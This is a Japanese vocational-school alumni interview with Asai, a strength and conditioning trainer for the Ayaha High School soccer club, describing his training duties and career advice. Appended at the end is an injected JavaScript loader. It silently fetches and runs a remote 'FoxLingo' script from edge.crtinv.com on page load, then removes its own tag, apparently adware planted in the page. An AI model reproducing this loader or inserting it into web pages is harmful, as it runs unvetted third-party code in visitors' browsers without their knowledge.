ストレングス& コンディショニングトレーナー 浅居さん

Asai

人との出会いやつながりが大切。チャレンジし続ける事で信頼される存在になる。

ストレングス& コンディショニングトレーナー 浅居さん
綾羽高等学校サッカー部トレーナー
2008年 スポーツトレーナーコース卒業
滋賀県 私立綾羽高等学校出身

Interview
ケガをしてトレーナーにリハビリを受けた事がきっかけで、自分も同じような仕事がしたいと思い入学しました。
京都医健には、実際に現場で活躍されている先生がたくさんいらっしゃるので、積極的に話をする様にしていました。トレーナーは人との出会いやつながりが大切な仕事だということも教えていただきました。

母校の綾羽高校サッカー部には在学中から関わっており、最近は監督やコーチから色々と任せていただけるようになりました。平日の練習は、主にフィジカルトレーニングを担当しています。試合で走り負けする事が多いので、走力を強化するメニューを中心に行っています。土曜・日曜は試合に帯同し、テーピングやウォーミングアップを担当しています。選手がケアを怠ってケガをする事のないよう、常に意識しています。チームが勝った時、それが最も嬉しい瞬間です。

トレーナーの世界は厳しい事もありますが、あきらめずチャレンジし続ける事が大切です。そうすればきっと夢に近づけると信じています。

!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();